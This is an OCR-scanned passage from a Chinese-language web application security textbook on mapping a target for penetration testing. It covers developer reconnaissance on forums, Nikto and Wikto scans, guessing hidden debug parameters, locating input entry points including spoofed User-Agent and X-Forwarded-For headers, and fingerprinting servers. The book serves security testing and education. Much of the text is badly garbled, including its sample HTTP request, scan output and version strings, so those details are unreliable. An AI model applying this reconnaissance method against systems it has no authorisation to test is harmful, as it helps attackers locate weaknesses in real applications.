能 ， 它 们 可 能 仍然 有 用 。 陈 旧 功 能 中 可 能 包含 应 用 程序 其 他 地 方 并 
不 存在 的 漏洞 。 


即使 陈旧 内 容 已 经 从 现 有 应 用 程序 中 删除 ， 但 是 从 搜索 引擎 组 
存 或 Web 档 案 中 发 现 的 相关 信息 仍然 可 能 包含 与 应 用 程序 现 有 功能 
有 关 的 引用 或 线索 ， 它 们 可 能 有 助 于 攻击 者 向 其 实施 攻击 。 


开发 人 员 和 其 他 人 在 因特网 论坛 上 发 表 的 帖子 是 提供 目标 应 用 程 
序 有 用 信息 的 男 一 个 公共 来 源 。 因 特 网 上 有 大 量 软 件 设计 人 员 和 程序 
员 在 其 中 询问 和 回答 技术 问题 的 论坛 。 发 表 在 这 些 论坛 上 的 帖子 通常 
包含 与 应 用 程序 有 关 的 信息 ， 攻 击 者 可 直接 对 其 加 以 利用 。 这 些 信息 
包括 应 用 程序 使 用 的 技术 、 执 行 的 功能 、 在 开发 过 程 中 过 到 的 问题 、 
已 知 的 安全 缺陷 、 向 其 提交 以 帮助 解决 疑难 的 配置 与 日 志文 件 ， 甚 至 
EWM CSTR 。 


渗透 测试 步骤 


(1) 列 出 所 发 现 的 与 目标 应 用 程序 及 其 开发 有 关 的 每 一 个 姓 
名 和 电子 邮件 地 址 ， 其 中 应 包括 所 有 已 知 的 开发 者 、 在 HTML 源 代 


码 中 发 现 的 姓名 、 在 公司 主要 Web 站 点 联系 信息 部 分 发 现 的 姓名 以 
及 应 用 程序 本 身 披露 的 所 有 姓名 (如 管理 职员 ) 。 

(2) 使 用 上 文 描述 的 搜索 技巧 ， 搜 索 发 现 的 每 一 个 姓名 ， 查 
找 他 们 在 因特网 论坛 上 发 表 的 所 有 问题 和 答案 。 分 析 发 现 的 所 有 信 
思 ， 了 解 与 目标 应 用 程序 功能 或 漏洞 有 天 的 线索 。 


4. 利用 web 服 务 器 

Web 服 务 名 层面 存在 的 漏洞 有 助 于 攻击 者 发 现 Web 应 用 程序 中 并 
未 建立 链接 的 内 容 与 功能 。 例 如 ，Web 服 务 器 软件 中 存在 大 量 的 程序 
缺陷 ， 人 允许 攻击 者 枚 举目 录 的 内 容 ， 或 者 获取 服务 器 可 执行 的 动态 页 
面 的 原始 来 源 (请 参阅 第 18 章 了 解 这 些 漏洞 的 一 些 实例 以 及 确定 漏洞 
的 方法 ) 。 如 果 应 用 程序 中 存在 上 述 程序 缺陷 ， 攻 击 者 就 可 以 利用 它 
直接 获得 应 用 程序 的 所 有 页 面 和 其 他 资源 。 

许多 Web 服 务 器 上 默认 包含 有 助 于 攻击 者 对 其 实施 攻击 的 内 容 。 
例如 ， 样 本 和 诊断 性 脚本 中 可 能 包含 已 知 的 漏洞 ， 或 者 可 被 用 于 某 些 
恶意 用 途 的 功能 。 而 且 ， 许 多 Web 应 用 程序 整合 了 常用 的 第 三 方 组 
件 ， 执 行 各 种 常规 功能 ， 如 购物 车 、 论 坛 或 内 容 管理 系统 (CMS) 功 
能 。 这 些 功能 通常 安 效 在 与 Web 根 目录 或 应 用 程序 的 起 始 目 录 相 天 的 
固定 位 置 。 

本 质 上 ， 目 动 化 工具 非常 适用 于 执行 上 述 任 务 ， 许 多 上 自动 化 工具 
可 同一 系列 已 知 的 默认 Web 服 务 强 内 容 、 第 三 方 应 用 程序 组 件 和 常用 
目 孙 名 称 发 布 请 求 。 虽 然 这 些 工具 无 法 准确 查 明 任何 隐藏 的 预定 义 功 
能 ， 但 使 用 它们 往往 有 助 于 查找 其 他 应 用 程序 没有 建立 链接 以 及 有 利 
于 实施 攻击 的 资源 。 

Wikto 就 是 许多 能 够 执行 上 述 扫描 的 免费 工具 中 的 一 个 ， 其 中 还 包 
舍 一 个 可 配置 的 亦 力 攻击 内 容 列表 。 如 图 4-9 所 示 ， 针 对 Extreme 
Internet Shopping 站 点 进行 扫 摘 时 ， 它 可 以 使 用 上 自己 的 内 部 单词 表 确 定 
一 些 目录 。 由 于 其 中 包含 一 个 常用 Web 应 用 程序 软件 和 脚本 的 大 型 数 


据 库 ， 因 此 ， 它 还 能 确定 以 下 目 隶 ， 而 攻击 者 通过 目 动 或 用 户 驱 动 的 
抓 取 却 找 不 到 这 些 目 录 : 


Wegt 

0 002235087444472 
0 424242424062424 

ò 
00211267605533303 
O 049500770059601 
0.0228136882725278 
0 42424242424 2424 

6 

0 424242424252424 


Nemom prodem - retry: 0 


Toye: 
20 
200 
200 
20 
20 
200 
20 
200 
200 
200 
200 
200 
200 
200 


om 
om 
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图 4-9 将 Wikto 用 于 查找 内 容 和 某 些 已 知 的 漏洞 


http://eis/phpmyadmin/ 

此 外 ， 虽 然 /gb 目录 已 通过 抓 取 得 以 确定 ， 但 Wikto 确 定 了 以 下 
URL: 

/gb/index.php?login=true 

Wikto 检 查 该 URL， 是 因为 gbook PHP 应 用 程序 使 用 该 URL， 而 前 
者 包含 一 个 广为人知 的 漏洞 。 


警告 ”和 许多 商业 Web 扫 描 器 一 样 ，Nikto 和 Wikto 之 类 
的 工具 包含 大 量 默认 文件 和 目录 列表 ， 因 此 似乎 能 够 很 好 地 完成 大 


量 检查 任务 。 但 是 ， 这 些 检查 大 部 分 都 是 多 余 的 ， 错 误 警 报 也 经 营 


发 生 。 更 精粹 的 是 ， 如 有 果 将 服务 器 配置 为 隐藏 旗 标 、 将 脚本 或 脚本 
集合 移 至 其 他 目录 、 或 以 自 定 义 的 方式 处 理 HTTP 状 态 码 ， 还 经 党 
会 出 现 漏 报 。 为 此 ， 通 常 最 好 是 使 用 Burp Intruder 等 工具 ， 因 为 这 
类 工具 可 以 解 译 原始 的 啊 应 信息 ， 并 且 不 会 误 报 或 漏 报 问题 。 


渗透 测试 步骤 


运行 Nikto 时 可 以 参考 以 下 几 点 。 

(1) 如 果 认 为 服务 器 将 Nikto 检 查 的 内 容 保 存在 一 个 非 标 准 位 
置 (如 /cgi/cgi-bin 而 非 /cgi-bin) ， 可 以 使 用 -root/cgi/ 选 项 指定 这 个 
eee een 
年 位 置 。 

(2) 如 果 站 点 使 用 不 返回 HTTP404 状 态 码 的 file not found 定 制 


页 面 ， 可 以 指定 一 个 特殊 字符 串 ， 使 用 -404 选 项 标识 这 个 页 面 。 

(3) 注意 ，Nikto 并 不 对 潜在 的 问题 执行 任何 智能 核实 。 
此 ， 它 往往 会 做 出 错误 诊断 。 请 手动 核实 由 Nikto 返 回 的 任何 结果 。 

需要 注意 ， 在 使 用 Nikto 之 类 的 工具 时 ， 可 以 使 用 域名 或 耻 地 址 
来 指定 目标 应 用 程序 。 如 果 某 工具 使 用 IP 地 址 来 访问 一 个 页 面 ， 则 
此 工具 会 将 该 页 面 上 使 用 域名 的 链接 视 为 属于 不 同 的 域 ， 因 而 不 会 
访问 这 些 链接 。 这 样 做 是 有 道理 的 ， 因 为 一 些 应 用 程序 属于 虚拟 托 
管 应 用 程序 ， 有 多 个 域名 共 至 同一 个 IP 地 址 。 因 此 ， 在 配置 相关 工 
具 时 ， 请 记 住 上 述 事 实 。 


4.1.4_ 应 用 程序 页 面 与 功能 路 径 


迄今 为 止 ， 我 们 讨论 的 枚 举 技巧 实际 上 由 如 何 概念 化 和 分 类 Web 
应 用 程序 内 容 这 种 特殊 的 动机 暗中 推动 。 这 种 动机 源 目 于 Web 应 用 程 
序 出 现 之 前 的 万 维 网 时 代 ， 当 时 的 Web 服 务 右 古 静 态 信 息 仓库 ， 人 们 
使 用 实际 为 文件 名 的 URL 获 取 这 类 信息 。 要 公布 Web 内 容 ， 只 知人 简单 
生成 一 批 HTML 文 件 并 将 其 复制 到 Web 服 务 右 上 的 相应 目 孙 即 可 。 当 
用 户 单 击 超 链 接 时 ， 他 们 浏览 由 公布 者 创建 的 文件 ， 通 过 服务 器 上 目 
录 树 中 的 文件 名 请 求 每 个 文件 。 

虽然 Web 应 用 程序 的 急速 演变 从 根本 上 改变 了 用 户 与 Web 交 互 的 
体验 ,但 上 述 动机 仍然 适用 于 绝 大 多 数 的 Web 应 用 程序 内 容 和 功能 。 
各 种 功能 一 般 通 过 不 同 的 URL 访 问 ， 后 者 通 音 是 执行 该 项 功能 的 服务 
绒 端 脚本 的 名 称 。 请 求 参数 〈 位 于 URL 碍 询 字 符 串 或 POST 请 求 主 体 
中 ) 并 不 告知 应 用 程序 执行 何 种 功能 ， 而 是 告知 应 用 程序 在 执行 功能 


时 使 用 哪些 信息 。 有 鉴于 此 ， 建 立 基 于 URL 的 解析 方法 可 对 应 用 程序 
的 功能 进行 有 效 分 类 。 

在 使 用 REST 风 格 的 URL 的 应 用 程序 中 ，URL 文 件 路 人 径 的 某 些 部 分 
包含 实际 上 用 做 参数 值 的 字符 串 。 在 这 种 情况 下 ， 通 过 解析 URL， 扑 
虫 能 够 解析 应 用 程序 功能 和 这 些 功能 的 已 知 参数 值 列表 。 

但 是 ， 在 某 些 应 用 程序 中 ， 基 于 应 用 程序 “页 面 > 的 动机 并 不 适 
用 。 尽 管 从 理论 上 说 ， 我 们 可 以 将 任何 应 用 程序 结构 强制 插入 这 种 形 
式 的 表述 中 。 但 是 ， 在 许多 情况 下 ， 另 外 一 种 基于 功能 路 径 的 动机 可 
oe 效 地 分 类 其 内 容 与 功能 。 以 仅 使 用 以 下 请 求 访问 的 应 用 程序 
为 例 | 


POST /bank.isp HITP/1.1 
Host: -D .Com 
Content ngt 10 


serv let=TransferPunds&method=confirmlransfer&fromAccount=10372918&to 
va 


3910852£amount=291.23&eSubmit=Ck 


这 里 的 每 个 请 求 对 应 唯一 一 个 URL。 请 求 参数 指定 Java servlet Fil 
需要 调用 的 方法 ， 告 诉 应 用 程序 执行 何 种 功能 。 其 他 参数 提供 执行 该 
项 功能 所 需 的 信息 。 在 基于 应 用 程序 页 面 的 动机 中 ， 应 用 程序 明显 只 
有 一 种 功能 ， 且 基于 URL 的 解析 不 会 解释 它 的 功能 。 但 是 ， 如 果 我 们 
根据 功能 路 径 解析 应 用 程序 ， 束 能 更 加 清楚 地 了 解 应 用 程序 的 有 用 功 
能 。 图 4-10 是 应 用 程序 功能 路 径 图 的 一 部 分 。 
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图 4-10 ”Web 应 用 程序 功能 路 径 图 


即使 在 应 用 基于 应 用 程序 页 面 的 第 规 图 不 存在 任何 问题 的 情况 
下 ， 以 这 种 方式 描述 应 用 程序 的 功能 通常 更 加 有 用 。 在 URL 使 用 的 目 
录 结 构 中 ， 不 同 功 能 之 间 的 逻辑 与 依赖 关系 无 法 一 一 对 应 起 来 。 但 
征 ， 无 论 是 对 于 了 解 应 用 程序 的 核心 功能 ， 还 是 制订 可 能 的 攻击 方 
案 ， 这 些 逻 辑 天 系 对 攻击 者 而 言 都 非常 有 用 。 确 定 这 些 逻 错 关 系 后 ， 
攻击 者 项 能 够 全 面 了 解 应 用 程序 开发 人 员 在 执行 功能 时 的 期 竺 和 假 
设 ， 并 设法 找到 违 育 这 些 假设 、 在 应 用 程序 中 造成 无 法 预料 的 行为 的 


方法 。 

在 使 用 请 求 参数 而 非 URL 确 定 功能 的 应 用 程序 中 ， 这 种 方法 对 于 
枚 举 应 用 程序 的 功能 会 有 所 帮助 。 在 前 面 的 示例 中 ， 使 用 前 面 讨论 的 
内 容 查 找 技巧 目前 还 不 可 能 发 现任 何 隐藏 的 内 容 。 那 些 技巧 需要 根据 
应 用 程序 访问 功能 时 实际 使 用 的 机 制 修改 。 


渗透 测试 步骤 


(1) 确定 所 有 通过 在 参数 中 提交 某 一 功能 的 名 称 
(如 /admin.jsp?action=editUser) 而 非 通过 请 求 代 表 那 个 功能 的 一 个 
特殊 页 面 (如 /admin/editUser.jsp) 访问 应 用 程序 功能 的 情况 。 

(2) 修改 上 述 用 于 查找 URL 相 关内 容 的 自动 化 技巧 ， 利 用 它 
处 理应 用 程序 使 用 的 内 容 - 访 问 机 制 。 例 如 ， 如 果 应 用 程序 使 用 参 
数 指 定 servlet 和 方法 名 称 ， 首 先 确 定 它 在 请 求 一 个 无 效 servlet 或 方法 
以 及 请 求 一 个 有 效 方法 与 其 他 无 效 参数 时 的 行为 。 设 法 确定 表 
示 “ 触 点 ”( 即 有 效 servlet 和 方法 ) 的 服务 器 响应 的 特点 。 如 果 可 
能 ， 想 出 办 法 分 两 个 阶段 攻击 这 个 问题 ， 首 先 枚 举 servlet， 然 后 枚 
举 其 中 的 方法 。 对 用 于 查找 URL 相 关内 容 的 技巧 使 用 相似 的 方法 ， 
列 出 常见 项 目 ， 通 过 从 实际 观察 到 的 名 称 进 行 推 新 ， 增 加 这 些 项 
目 ， 并 根据 项 目 生成 大 量 请 求 。 

(3) 如 果 可 能 ， 根 据 功 能 路 径 绘制 一 幅 应 用 程序 内 容 图 ， 说 
明 所 有 被 枚 举 的 功能 和 逻辑 路 径 以 及 它们 之 间 的 依赖 关系 。 


4.1.5 “发现 隐藏 的 参数 


如 果 应 用 程序 使 用 其 他 参数 以 别 的 方式 控制 其 逻辑 ， 那 么 它 使 用 
请 求 参 数 说 明 应 执行 何 种 功能 的 情况 束 会 出 现 变 化 。 例 如 ， 如 采 在 
URL 的 查询 字符 串 中 加 入 debug=true 参 数 ， 应 用 程序 的 运作 方式 就 会 
发 生 改变 ， 它 可 能 会 天 闭 某 些 输入 确认 检查 ， 人 允许 用 户 避 开 某 些 访问 
控制 或 者 在 啊 应 中 显示 详细 的 调试 信息 。 许 多 时 候 ， 我 们 无 法 从 应 用 
程序 的 任何 内 容 直 接 推 断 它 如 何 处 理 这 个 参数 (例如 ， 它 并 不 在 超 链 
接 的 URL 中 插入 debug=false) 。 只 有 通过 和 猜测 许多 值 ， 才 能 在 提交 正 
确 的 值 之 后 了 解 这 个 参数 产生 的 效果 。 


渗透 测试 步骤 


(1) 使 用 常用 调试 参数 名 称 调试、 测试 、 隐 藏 、 来 源 等 ) 
和 常用 值 ( 真 、 是 、 开 通 和 1 等 列表， 向 一 个 已 知 的 应 用 程序 页 
面 和 功能 提出 大 量 请 求 。 重复 执行 这 一 操作 ， 直 到 浏览 完 所 有 名 / 值 
对 组 合 。 在 POST 请 求 的 URL 查 询 字 人 符 串 和 消 居 主体 中 插入 增加 的 
参数 。 


可 以 使 用 多 组 有 效 载 俩 和 “集束 炸弹 ” (cluster bomb) 攻击 类 型 
(请 参阅 第 14 章 了 解 详细 信息 ) ， 通 过 Burp Intruder 执 行 这 一 测 

试 。 

(2) 监控 收 到 的 全 部 响应 ， 确 定 任何 表明 增加 的 参数 给 应 用 
程序 处 理 过 程 造成 影响 的 异常 。 

(3) 根据 可 用 时 间 ， 在 许多 不 同 的 页 面 或 功能 中 查找 隐藏 的 
人 参数。 选择 开发 人 员 最 有 可 能 在 其 中 执行 调试 逻辑 的 功能 ， 如 登 
杂 、 搜 索 、 文 件 上 传 和 下 载 等 。 


4.2 YY 是 


枚 举 尽 可 能 多 的 应 用 程序 内 容 只 是 解析 过 程 的 一 个 方面 。 分 析 应 
用 程序 的 功能 、 行 为 及 使 用 的 技术 ， 确 定 它 骏 露 的 关键 受 攻击 面 ， 并 
开始 想 出 办 法 探查 其 中 可 供 利 用 的 漏洞 ， 这 项 任务 也 同样 重要 。 

值得 研究 的 一 些 重要 方面 如 下 。 
口 应 用 程序 的 核心 功能 : 用 于 特定 目的 时 可 利用 它 执 行 的 操作 。 
口 其 他 较为 外 围 的 应 用 程序 行为 ， 包 括 站 外 链接 、 错 误 消 轧 、 管 
理 与 日 志 功 能 、 重 定向 使 用 等 。 
口 核心 安全 机 制 及 其 运作 方式 ， 特 别 是 会 话 状态 、 访 问 控 制 以 及 
验证 机 制 与 支持 逻辑 (用 户 注 册 、 密 码 修 改 、 账 户 恢复 等 ) 。 
口 应 用 程序 处 理 用 户 提交 的 输入 的 所 有 不 同位 置 ， 每 个 URL、 查 
询 字 符 串 参数 、POST 数 据 、cookie 以 及 类 似 内 容 。 
口 客 户 端 使 用 的 技术 ， 包 括 表单 、 客 户 端 脚本 、 厚 客户 端 组 件 
(Java applet、ActiveX 探 件 和 Flash) 和 cookie ° 
口服 务 需 端 使 用 的 技术 ， 包 括 静 态 与 动态 页 面 、 使 用 的 请 求 参 数 
人 ` o 、Web 服 务 器 软件 、 数 据 库 交互 、 电 子 邮 件 系 统 和 其 他 
c mA a 

口 任 何 可 收集 到 的 、 关 于 服务 器 端 应 用 程序 内 部 结构 与 功能 的 其 
他 信息 〈 客 户 端 可 见 的 功能 和 行为 的 后 台 传 输 机 制 ) 。 


4.2.1 确定 用 户 输 入 入 口 点 


在 检查 枚 举 应 用 程序 功能 时 生成 的 HTTP 请 求 的 过 程 中 ， 可 以 确定 
应 用 程序 获取 用 户 输 入 (由 服务 器 处 理 ) 的 绝 大 部 分 位 置 。 需 要 注意 
的 关键 位 置 包 括 以 下 几 项 。 
口 每 个 URL 字 符 串 ， 包 括 查 询 字 符 串 标记 。 
口 URL 查 询 字 符 串 中 提交 的 每 个 参数 。 
口 POST 请 求 主体 中 提交 的 每 个 参数 。 
口 每 个 cookie 。 
口 极 少 情况 下 可 能 包括 由 应 用 程序 处 理 的 其 他 所 有 HTTP 消 息 头 ， 
特别 是 User-Agent、Referer、Accept、AcceptrLanguage 和 Host 消 息 头 。 
1. URL 文 件 路 径 


通常 ， 查 询 字 符 串 之 前 的 URL 部 分 并 不 被 视 为 是 进入 点 ， 因 为 人 
们 认为 它们 只 是 服务 器 文件 系统 上 的 目录 和 文件 的 名 称 。 但 是 ， 在 使 
用 REST 风 格 的 URE 的 应 用 程序 中 ， 查 询 字 符 串 之 前 的 URL 部 分 实际 上 
可 以 作为 数据 参数 ， 并 且 和 进入 点 一 样 重要 ， 因 为 用 户 输入 就 是 查询 
字符 串 本 身 。 

典型 的 REST 风 格 的 URL 可 以 采用 以 下 格式 : 


http://eis/shop/browse/electronics/iPhone3G/ 
在 这 个 示例 中 ， 字 符 串 electronics 和 iPhone3G 应 被 视 为 存储 搜索 功能 的 
参数 。 

同样 ， 在 下 面 这 个 URL 中 : 


http://eis/updates/2010/12/25/my-new-iphone/ 
updates 之 后 的 每 个 URL 组 件 都 可 以 以 REST 方 式 进行 处 理 。 

根据 URL 结 构 和 应 用 程序 上 上下文， 我们 可 以 轻松 确定 使 用 REST 风 
格 的 URL 的 应 用 程序 。 但 是 ， 在 解析 应 用 程序 时 ， 并 不 存在 必须 遵循 
的 固有 标准 ， 因 为 用 户 与 应 用 程序 的 交互 方式 通常 由 应 用 程序 的 开发 
者 决定 。 

2. 请求 参数 

多 数 情况 下 ， 在 URL 碍 询 字 符 串 、 消 息 主 体 和 HTTP cookie 中 提交 
的 参数 都 是 明显 的 用 户 输入 进入 点 。 但 是 ， 一 些 应 用 程序 并 不 对 这 些 
参数 使 用 标准 的 name=value 格 式 ， 而 是 使 用 定制 的 方案 。 定 制 方案 采 
用 非 标准 得 询 字 符 串 标记 和 字段 分 隔 符 ， 甚 至 可 能 在 参数 数据 中 般 入 
其 他 数据 方案 (如 XML) 。 
以 下 是 笔者 在 现实 世界 中 遇 到 的 一 些 非 标准 参数 格式 实例 : 
g /dir/file;foo=bar&foo2=bar2; 
g /dir/file?foo=bar$foo2=bar2 ; 
g /dir/file/fo0%3dbar%26f002%3dbar2; 
g dir/foo.bar/file ; 
g /dir/foo=bar/file ; 
g /dir/file?param=foo:bar; 
g /dir/file? 
data=%3cfoo%3ebar%3c%2ff00%3e%3cfoo2%3ebar2%3c%2ff002%3e ° 

如 果 应 用 程序 使 用 非 标 准 的 查询 字符 串 格 式 ， 那 么 在 探查 其 中 是 
否 存 在 各 种 常见 的 漏洞 时 必须 考虑 到 这 种 情况 。 例 如 ， 测 试 上 面 最 后 
一 个 URL 时 ， 如 果 忽 略 定制 格式 ， 认 为 其 仅 包含 一 个 名 为 data 的 参 


数 ， 因 而 提交 各 种 攻击 有 效 载 集 作为 这 个 参数 的 值 ， 对 其 进行 简单 处 
理 ， 那 么 可 能 会 遗漏 处 理 查 询 字 人 符 串 过 程 中 存在 的 许多 漏洞 。 相 反 ， 
如 宁 详 细 分 析 它 使 用 的 定制 格式 并 将 有 歼 载 傈 提交 到 磐 入 的 XML 数据 
字段 中 ， 立 即 就 会 发 现 严 重 缺 陷 ， 如 SQL 注 入 或 路 人 径 裔 历 。 

3. HTTP 消 息 头 

许多 应 用 程序 执行 定制 的 日 志 功 能 ， 并 可 能 会 记录 HTTP 消 筷 类 
(如 Referer 和 User-Agent) 的 内 容 。 应 始终 将 这 些 消息 头 视 为 基于 输 
入 的 攻击 的 可 能 进入 点 。 

一 些 应 用 程序 还 对 Referer 消 息 头 进行 其 他 处 理 。 例 如 ， 应 用 程序 
可 能 检测 到 用 户 已 通过 搜索 引擎 到 达 ， 并 提供 针对 用 户 的 搜索 查询 的 
定制 啊 应 。 一 些 应 用 程序 可 能 会 回应 搜索 术语 ， 或 者 尝试 突出 显示 响 
应 中 的 匹配 表达 式 。 一 些 应 用 程序 则 通过 动态 添加 HTML 关键 字 等 内 
容 ， 并 包含 搜索 引擎 中 最 近 的 访问 者 搜索 的 字符 串 ， 以 提高 它们 在 搜 
索引 擎 中 的 排名 。 这 时 ， 通 过 提出 大 量 包含 经 过 适当 设计 的 Referer 
URL 的 请 求 ， 束 可 以 不 断 在 应 用 程序 的 响应 中 注入 内 容 。 

近年 来 出 现 了 一 个 重要 的 趋势 ， 即 应 用 程序 向 通过 不 同 设备 (如 
笔记 本 电脑 、 移 动 电话 、 平 板 电脑 ) 进行 访问 的 用 户 呈 现 不 同 的 内 
容 。 应 用 程序 通过 检查 User-Agent 消 息 头 实现 这 一 目的 。 除 了 能 为 直 
接 在 User-Agent 消 息 涉 本 二 中 实施 的 基于 输入 的 攻击 提供 “便利 ”外 ， 这 
种 行为 还 可 以 揭示 应 用 程序 中 的 其 他 受 攻 击 面 。 通 过 伪造 流行 移动 设 
备 的 User-Agent 消 息 头 ， 攻 击 者 可 以 访问 其 行为 与 主要 界面 不 同 的 简 
化 用 户 界面 。 由 于 这 种 界面 通过 服务 器 端 应 用 程序 中 的 不 同 代码 路 径 
生成 ， 并 且 可 能 并 未 经 过 严格 的 安全 测试 ， 因 此 ， 攻 击 者 残 可 以 确定 
主要 应 用 程序 界面 中 并 不 存在 的 漏洞 (如 跨 站 点 脚本 ) 。 


YV RR Burp Intruder 提 供 了 一 个 内 置 的 有 效 载荷 列表 ， 其 中 
包含 大 量 针对 不 同类 型 设备 的 用 户 代理 字符 串 。 攻 击 者 可 以 执行 一 


次 简单 的 攻击 ， 即 癌 提 供 不 同 用 户 代理 字符 串 的 应 用 程序 主页 面 提 
出 一 个 GET 请 求 ， 然 后 检查 Burp Intruder 返 回 的 结果 ， 从 中 确定 表明 
使 用 了 不 同 用 户 界面 的 反 稍 现象 


除了 针对 浏览 硕 殉 认 发 送 或 应 用 程序 组 件 添加 的 HTTP 请 求 消 息 头 
实施 攻击 外 ， 有 些 时 候 ， 攻 击 者 还 可 以 通过 添加 应 用 程序 可 能 会 处 理 


的 其 他 消息 头 来 实施 成 功 的 攻击 。 例 如 ， 许 多 应 用 程序 会 对 客户 的 卫 
地 址 进行 某 种 处 理 ， 以 执行 日 志 、 访 问 控制 或 用 户 地 理 位 置 定 位 等 功 
能 。 通 常 ， 应 用 程序 通过 平台 API 可 以 访问 客户 的 网 络 连 接 IP 地 址 。 但 
是 ， 如 果 应 用 程序 位 于 负载 均衡 器 或 代理 服务 器 之 后 ， 应 用 程序 可 能 
会 使 用 X-Forwarded-For 请 求 消息 头 (如 果 存 在 ) 中 指定 的 人 P 地 址 。 然 
后 ， 开 发 者 可 能 误 认 为 该 IP 地 址 是 安全 的 ， 并 以 危险 的 方式 处 理 该 地 
址 。 在 这 种 情况 下 ， 通 过 添加 适当 设计 的 X-Forwarded-For 消 息 涉 ， 攻 
击 者 天 可 以 实施 SQL 注入 或 持续 的 跨 站 点 脚本 等 攻击 。 

4. 带 外 通道 

最 后 一 类 用 户 输 入 进入 点 是 种 外 通道 ， 应 用 程序 通过 它 接收 攻击 
考 能 够 控制 的 数据 。 如 果 只 是 检查 应 用 程序 生成 的 HTTP 流 量 ， 攻 击 考 
可 能 根本 无 法 检测 到 其 中 一 些 进 入 点 ， 发 现 它们 往往 需要 全 面 了 解 应 
用 程序 所 执行 的 各 种 功能 。 通 过 带 外 通道 接收 用 户 可 控制 的 数据 的 
Web 应 用 程序 包括 : 
口 处 理 并 显示 通过 SMTP 接 收 到 的 电子 邮件 消息 的 Web 邮件 应 用 程 
Y. 


口 具 有 通过 HTTP 从 其 他 服务 絮 获 取 内 容 功 能 的 发 布 应 用 程序 ; 

口 使 用 网 络 嗅 探 器 收集 数据 并 通过 Web 应 用 程序 界面 显示 这 些 数 
据 的 入 侵 检测 应 用 程序 : 

口 任 何 提 供 由 非 浏 览 器 用 户 代 理 使 用 的 API 接 口 (如 果 通 过 此 接口 
real 主 Web 应 用 程序 共享 ) 的 应 用 程序 ， 如 移动 电话 应 用 程 
Y o 


4.2.2 ”确定 服务 器 端 技 术 


通常 ， 我 们 可 以 通过 各 种 线索 和 指标 确定 服务 器 所 采用 的 技术 。 

1. 提取 版 本 信息 

许多 Web 服 务 瑚 公开 与 Web 服 务 融 软件 本 吴 和 所 安 闻 组件 有 关 的 
人 ° 例如 ，HTTP Server 消 轧 头 揭示 大 量 与 安装 软件 有 关 的 


HD: 


erver: Apache/21.3.312 (Unix) mod_gzip/1.3.26.1la mod_auth_passthrough/ 
1.8 moG_log_bytes/1.2 mod_bwlimited/i.4 PHP/4.3.9 FrontPage/ 


).2.2634a mod_ssl/z2 OpenSSL/0.9.7a 


od 除 Server 消 轧 头 外 ， 下 列 位 置 也 可 能 的 露 有 天 软 件 类 型 和 版 本 的 


A 


口 建立 HTML 页 面 的 模板 ; 

口 定制 的 HTTP 消 息 头 ; 

口 URL 查 询 字 符 串 参数 。 

2. HTTP 指 纹 识别 

从 理论 上 说 ， 服 务 器 返回 的 任何 信息 都 可 加 以 定制 或 进行 有 意 伪 
造 ，Server 消 息 头 等 内 容 也 不 例外 。 大 多 数 应 用 程序 服务 器 软件 允许 
管理 员 配 置 在 Server HTTP 消息 头 中 返回 的 旗 标 。 尽 管 采 取 了 这 些 防 御 
措施 ， 但 通常 而 言 ， 蓄 意 破 坏 的 攻击 者 仍然 可 以 利用 Web 服 务 器 的 其 
他 行为 确定 其 所 使 用 的 软件 ， 或 者 至 少 缩小 搜索 范围 。HTTP 规 范 中 包 
含 许 多 可 选 或 由 执行 者 自行 决定 是 否 使 用 的 内 容 。 另 外 ， 许 多 Web 服 
务 器 还 以 各 种 不 同 的 方式 违背 或 扩展 该 规范 。 因 此 ， 除 通过 Servery 肖 
息 头 判断 外 ， 还 可 以 使 用 大 量 迁 回 的 方法 来 识别 Web 服 务 器 。 在 图 4- 
11 中 ，Httprecon 工 具 正 对 EIS 应 用 程序 进行 扫描 ， 并 以 不 同 的 可 信和 度 报 
告 各 种 可 能 的 Web 服务 器 。 


BS httprecon 7.3 - http://eis:80/ elo) X 


File Configuration Fingerprinting Reporting Help 


Target (Apache 2.0 54) 


(http: 了 | [eis la0 ~] Analyze 


GFT misting | GET long roquaot | GET non-onioing | GET wrong protocol | HEAD onicting| OPTION 4 | > 


FMatehis sf (352 Implemertatons i} | Fingerprint Detals | Report Preview | 


Name 
Ye, Apache 20.54 
WW Apache 2.0.55 94.23.. 
W Apache 224 87.5 


Hits | Match % % + 
104 

3 

gi 

Ye Apache 2211 3 86.53.. 

0 

82 

8 


100 


A Microsolt IIS 6.0 
W Apache 2.0.46 
YW Apache 223 
ES A ' 


Generate HTML Report... Done 


14-11 Httprecon 正 在 识别 EIS 应 用 程序 


3. 文件 扩展 名 
URL 中 使 用 的 文件 扩展 名 往往 能 够 揭示 应 用 程序 执行 相关 功能 所 
使 用 的 平台 或 编程 语言 。 例 如 : 
口 asp 一 一 Microsoft Active Server Pages; 
DQ aspx——Microsoft ASP.NET; 
jsp Java Server Pages; 
cfm: Cold Fusion; 
口 php 一 一 PHP 语 言 ; 
口 d2w——WebSphere; 
口 pl 一 一 Perl 语 言 ; 
口 py 一 一 Python 语言 ; 


口 一 一 通常 为 编译 型 本 地 代码 〈C 或 C++) ; 

口 nsf 或 ntf Lotus Domino ° 

即使 应 用 程序 在 它 公布 的 内 容 中 并 不 使 用 特定 的 文件 扩展 名 ， 但 
我 们 一 般 还 是 能 够 确定 服务 器 是 否 执行 支持 该 扩展 名 的 技术 。 例 如 ， 
如 果 应 用 程序 上 安装 有 ASPNET， 请 求 一 个 不 存在 的 .aspx 文 件 将 返回 
一 个 由 ASPNET 框 架 生 成 的 错误 页 面 ， 如 图 4-12 所 示 。 但 是 ， 请 求 一 
个 扩展 名 不 同 的 不 存在 的 文件 将 返回 一 个 由 Web 服 务 器 生成 的 常规 错 
误 消 息 ， 如 图 4-13 所 示 。 


@ The resource annot be found. - Moris Firefox 


Bie fdt Yew Maloy Socionaks [outs Help 


a= i Cc A http /madsec.met/foo aspa 4 万 


The resowrce cannot be found. 
Server Error in '/' Application. 


The resource cannot be found. 


Description: HTTP 404 The recourse you are Dorn fer (Or One Of BE CEDSNSETC SE) Cou Nave D447 TeTOvES Sed OE ATE Changes, OF ag emparar ty Na Ie 
Means rovov tho iofowirg JE and mate sure Tex ta spolod correctly 


Requested URL; (oo asm 


Done 


Ra 一 个 指出 服 务 需 上 安村 有 ASPNET 平 全 的 定制 竺 误 页 而 


4 The page cannot be fourd - Mozda breton 
Ele Edit View bigtory Bookmarks Icos lj 


© 2 ¢ a ħitp//mdrer ret Too. ssp 4 p 


The gage cannol be found 


The page cannot be found 


The cage you are locking for might have been removed, had ts 
o temporary unavealable 


e Meks sure thet the Web ste oddress dsclaycg n ths oddrcas ber of veur 
browser is spelled and formatted correctly 


o Tf you resched ths page by clic G A tact the Web ste 
administrator to alert them that the ink is correctly formatted 
